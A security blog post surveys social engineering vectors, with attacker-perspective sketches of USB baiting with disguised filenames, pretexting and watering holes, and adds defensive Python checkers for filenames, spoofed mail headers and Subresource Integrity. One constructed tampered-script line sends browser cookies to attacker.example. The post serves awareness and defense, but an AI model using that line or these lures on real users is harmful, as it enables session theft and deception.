Top Social Engineering Attack Vectors

Dennis Eichardt
Axel Springer Tech
Jun 16, 2020
A chain is no stronger than its weakest link. — Photo by JJ Ying on Unsplash

So, where do we research what the top attack vectors are? Who defines that? I started by grabbing one of the many, many sources:

https://us.norton.com/internetsecurity-emerging-threats-what-is-social-engineering.html

So according to this page the top vectors are:

  • Baiting
  • Phishing
  • Email hacking and contact spamming
  • Pretexting
  • Quid pro quo
  • Vishing

Let’s shed some light onto each one of these to see what is what.

Baiting

You leave something as bait for the victim to pick up, for example a USB stick in the parking lot. To make the bait more attractive, you add a label such as "accounting" or "confidential".

Attack vector:

I would leave a USB stick with an interesting label like "CEO" or "confidential" right next to the company entrance, with a small payload on it. Ideally I would find out beforehand which kind of systems the employees use and tailor the payload to them. AutoRun from USB sticks has been disabled by default on Windows since Windows 7 (and on XP/Vista by an update in 2011), so I would not count on it: instead I would make the files as interesting as possible and camouflage the payload as a picture or a document, for example with a double extension or a right-to-left override character in the filename. A keystroke-injecting device that presents itself as a USB keyboard is the other common way around the missing AutoRun.
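The defender's side of the "camouflaged as a picture or document" trick is a filename check. The script below is an added example, not code from the original post: it flags the usual disguises (executable extension, double extension, right-to-left override, padding spaces, mixed Latin/Cyrillic letters). The sample filenames are constructed, and the extension sets are an assumption, not a complete policy.

```python
"""Flag filenames that camouflage an executable as a picture or document.

Added example, not code from the original post. The filenames in the demo are
constructed; the extension sets are an assumption, not a complete policy.
"""
import unicodedata
from typing import List

# Extensions Windows runs on double-click (assumed list, not exhaustive).
EXECUTABLE_EXTS = {"exe", "scr", "com", "bat", "cmd", "js", "jse", "vbs", "wsf",
                   "hta", "lnk", "msi", "pif", "ps1"}
# Extensions a victim expects on a "harmless" document or picture.
HARMLESS_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx",
                 "jpg", "jpeg", "png", "gif", "txt"}
# Unicode bidi overrides/isolates: they reverse how the rest of the name is drawn.
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068"}


def classify(name: str) -> List[str]:
    """Return the reasons a filename looks disguised (empty list = nothing found)."""
    reasons = []

    # 1. Right-to-left override: "photo\u202egnp.exe" is displayed as "photoexe.png",
    #    but the OS still opens it as an .exe.
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi-override")

    # Work on the name the OS sees, not the one the user sees.
    visible = "".join(ch for ch in name if ch not in BIDI_CONTROLS).lower()
    parts = visible.split(".")
    real_ext = parts[-1].strip() if len(parts) > 1 else ""
    prev_ext = parts[-2].strip() if len(parts) > 2 else ""

    # 2. The extension that actually counts is executable.
    if real_ext in EXECUTABLE_EXTS:
        reasons.append(f"executable-extension:{real_ext}")

    # 3. Double extension such as "invoice.pdf.exe": Explorer hides the last one
    #    by default, so the user sees "invoice.pdf".
    if prev_ext in HARMLESS_EXTS and real_ext in EXECUTABLE_EXTS:
        reasons.append("double-extension")

    # 4. A run of spaces pushes the real extension out of the visible column.
    if "    " in visible:
        reasons.append("padding-spaces")

    # 5. Mixed scripts: a Cyrillic "а" dropped into an otherwise Latin name renders
    #    identically to the Latin letter. Umlauts alone are Latin and stay clean.
    scripts = {unicodedata.name(ch, "?").split()[0] for ch in visible if ch.isalpha()}
    if "LATIN" in scripts and "CYRILLIC" in scripts:
        reasons.append("mixed-scripts")

    return reasons


if __name__ == "__main__":
    # Constructed sample names such as an attacker might drop on a bait stick.
    for sample in ["CEO_salaries.xlsx",
                   "invoice.pdf.exe",
                   "photo\u202egnp.exe",
                   "report.pdf" + " " * 40 + ".exe",
                   "d\u0430ta.xlsx",
                   "kündigung.docx"]:
        print(repr(sample), "->", classify(sample) or "clean")
```

The same checks belong in the mail gateway for attachments, not only on removable media; a name that trips two of them at once (double extension plus bidi override) is almost never legitimate.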

Phishing / Spearphishing

Where I was born there is a group of historical traditionalists who call themselves the “Sohlnburger Büttpedder” (http://www.sohlnborger-buettpedder.de/). In the days when fishing was done without boats, they caught fish by stomping on them and spearing them.

Today they “just” sing, so they mean no harm to animals anymore. Thank goodness.

So phishing is the mass version: mails to everyone, asking for credentials and the like, and whoever bites is the victim. Spearphishing has one specific target who was selected and researched before the attack, so the mail can be tailored to that person.

Email hacking and contact spamming

Social engineers work out who you exchange emails with regularly. Then they impersonate that person, or send from that person's compromised account, so that you click the link without a second thought.

How I would do it:

I know that editors of big news sites will most likely use a CMS. I would crawl the site for hints about which one (generator tags in the page source, HTTP headers, well-known admin paths). Then my mails would go like:

“Check what I found about QuickPublishSuperCMS! This is totally cool!” and plant a malicious link there.
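Most of these mails fall over on the headers before anyone reads the body: the display name belongs to someone you know, but the address, the Reply-To or the envelope sender does not. The check below is an added example, not code from the original post. It parses a constructed message with Python's standard `email` module and compares the claimed identity against a small assumed address book; the contact names and domains are invented.

```python
"""Flag mails whose sender identity does not add up.

Added example, not code from the original post. The messages below are
constructed; KNOWN_CONTACTS is an assumed stand-in for a real address book.
"""
from email import message_from_string
from email.policy import default
from email.utils import parseaddr
from typing import Dict, List

# Assumed address book: display name -> the address you actually correspond with.
KNOWN_CONTACTS: Dict[str, str] = {
    "Sabine Meier": "sabine.meier@supercorp.example",
}


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def check_sender(raw: str, contacts: Dict[str, str] = KNOWN_CONTACTS) -> List[str]:
    """Return a list of findings (empty list = headers are consistent)."""
    msg = message_from_string(raw, policy=default)
    findings = []
    from_name, from_addr = parseaddr(msg.get("From", ""))
    from_domain = _domain(from_addr)

    # 1. Display name is one of your contacts, but the address is not theirs.
    expected = contacts.get(from_name)
    if expected and expected.lower() != from_addr.lower():
        findings.append(f"known-name-unknown-address:{from_addr}")

    # 2. The display name itself looks like an address that differs from the
    #    real one; many clients show only the display name.
    if "@" in from_name and from_name.lower() != from_addr.lower():
        findings.append("address-in-display-name")

    # 3. Reply-To points to another domain: your answer (or your password
    #    "for verification") goes to the attacker, not to the person you see.
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    if reply_addr and _domain(reply_addr) != from_domain:
        findings.append(f"reply-to-other-domain:{reply_addr}")

    # 4. Envelope sender (Return-Path) from another domain. Mailing lists and
    #    bulk senders do this legitimately, so it is a signal, not proof.
    _, return_addr = parseaddr(msg.get("Return-Path", ""))
    if return_addr and _domain(return_addr) != from_domain:
        findings.append(f"return-path-other-domain:{return_addr}")

    return findings


# Constructed phishing mail in the style described above.
SUSPICIOUS = """\
Return-Path: <bounce@mail-relay.example.net>
From: Sabine Meier <sabine.meier@supercorp-it.example>
Reply-To: Sabine Meier <s.meier@webmail.example>
To: editor@newssite.example
Subject: Check what I found about QuickPublishSuperCMS!

This is totally cool: https://quickpublish-update.example/patch
"""

# Constructed legitimate mail from the same contact.
LEGIT = """\
Return-Path: <sabine.meier@supercorp.example>
From: Sabine Meier <sabine.meier@supercorp.example>
To: editor@newssite.example
Subject: Lunch?

See you at 12.
"""

if __name__ == "__main__":
    print("suspicious:", check_sender(SUSPICIOUS))
    print("legit:", check_sender(LEGIT))
```

Note what this does not catch: a mail sent from the contact's genuinely hacked account passes all four checks, which is exactly why the "email hacking" half of this vector works. For that case you are left with content and behaviour (unexpected links, urgency, a request that the person would never make by mail) and, on the infrastructure side, SPF/DKIM/DMARC results in the Authentication-Results header.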

Pretexting

You hook the victim with a made-up story. The classic example is the "a relative has died and the family wants to transfer all the money" mail you get from time to time.

How I would do it:

Maybe I would investigate the company structure via XING or LinkedIn and pick out two important roles, preferably CEO or CTO. Then I would build a story around them: I just met one of them and she or he asked me to send you this link. She or he was just off to the laundry and had no time, or something like that…

So the "pretext" is the fabricated reason or scenario, and pretexting is preparing that cover story specifically for the victim.

Quid pro quo

The attacker promises you something in exchange. “I give you this, you give me that.”

Someone posing as IT support calls you and offers to clean your machine of viruses. In exchange they ask for your login credentials.

With those, the attacker can take over your machine and use it as a foothold for further attacks. Real support staff do not need your password, which is the simplest rule to teach.

Vishing

It is the same as phishing, but with a twist:

"V" is for voice.

The same tricks that work in mail are tried verbally, usually over the phone, where the caller can apply pressure in real time and the displayed caller ID is easy to spoof.

Two more common social engineering attacks worth knowing:

  • Tailgating
  • Watering hole

According to this page (in German):

Tailgating

An unknown person who doesn't belong to the company follows you through a secured door.

A related trick: someone asks whether they could use your phone or computer for a moment, usually for a simple task. Then they install malware or spyware.

At some external con: “Hey Sebastian, you are from SuperCorp, we met here before, right? You remember, last year! At that afterparty, you remember me? My MacBook can’t open this presentation properly. All the formatting is broken. (No wonder, I manipulated the file, ehehehe…) May I use yours for a moment please?”

Who would say “no” to that? Be honest.

Better Call Saul (S04 E01): Social Engineering

Watch and learn. :) If you show enough confidence, no door will stop you.

Watering Hole

The attacker picks a website he knows you use frequently and infects it with malware, then waits for you to come by. It's like predators waiting at a watering hole where the animals come to drink from time to time.

Attack vector:

If the canteen of a big company had a website on the public internet, the attacker could book a JavaScript ad banner there (malvertising) or compromise the site itself. As soon as you visit the website, the script runs in your browser with the site's permissions and tries to exploit the browser or to push a fake update or download on you.
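The site operator's counter to a swapped-out third-party script is Subresource Integrity: the page pins the hash of the script it expects, and the browser refuses to run anything else. The block below is an added example, not code from the original post; it computes the `integrity` value with Python's standard library and models the browser's comparison. The banner script bodies are constructed, and `script_tag` is an illustrative helper, not any ad network's API.

```python
"""Subresource Integrity (SRI) for a third-party script such as an ad banner.

Added example, not code from the original post. Script bodies are constructed;
script_tag() is an illustrative helper, not a real ad network's API.
"""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Value for the integrity attribute: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError(f"unsupported SRI algorithm: {algo}")
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, body: bytes) -> str:
    """The tag to ship. crossorigin is required for SRI on cross-origin scripts."""
    return (f'<script src="{src}" integrity="{sri_hash(body)}" '
            f'crossorigin="anonymous"></script>')


def browser_would_execute(body: bytes, integrity: str) -> bool:
    """What a browser does on load: hash the fetched body, compare with each
    pinned value (the attribute may list several), refuse on no match."""
    for token in integrity.split():
        algo = token.partition("-")[0]
        if algo in SRI_ALGOS and hmac.compare_digest(sri_hash(body, algo), token):
            return True
    return False


# Constructed "ad banner" the site reviewed and pinned ...
BANNER_V1 = b"document.getElementById('ad').innerHTML = '<img src=\"/menu-of-the-week.png\">';"
# ... and the version served after the ad host was compromised (watering hole).
BANNER_TAMPERED = BANNER_V1 + b"\nnew Image().src = 'https://attacker.example/c?' + document.cookie;"

PINNED = sri_hash(BANNER_V1)

if __name__ == "__main__":
    print(script_tag("https://ads.example/banner.js", BANNER_V1))
    print("original runs:", browser_would_execute(BANNER_V1, PINNED))
    print("tampered runs:", browser_would_execute(BANNER_TAMPERED, PINNED))
```

The caveat a practitioner wants: SRI only works for scripts whose content you control or have pinned, and ad networks rotate their scripts constantly, so in practice it protects your own static bundles and vendored libraries. For actual ads, the control is to keep third-party script out of the page's origin altogether, for example by serving it in a sandboxed cross-origin iframe, and to restrict what may load at all with a Content-Security-Policy header.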

Some questions that may spark a discussion about this topic in your company:

  • Have you ever been victim to social engineering? Or do you know somebody who has?
  • How would you attack your company? What would your vector be?
  • What do you do to prevent these attacks?
  • Have you already caught somebody who tried a social engineering attack on you or your company?
  • Do you teach people to recognize those attacks? How?


From Hamburg, Germany. Technology has to serve the people, but for that, technology has to become a part of people. Artificial intelligence, VR, robotics.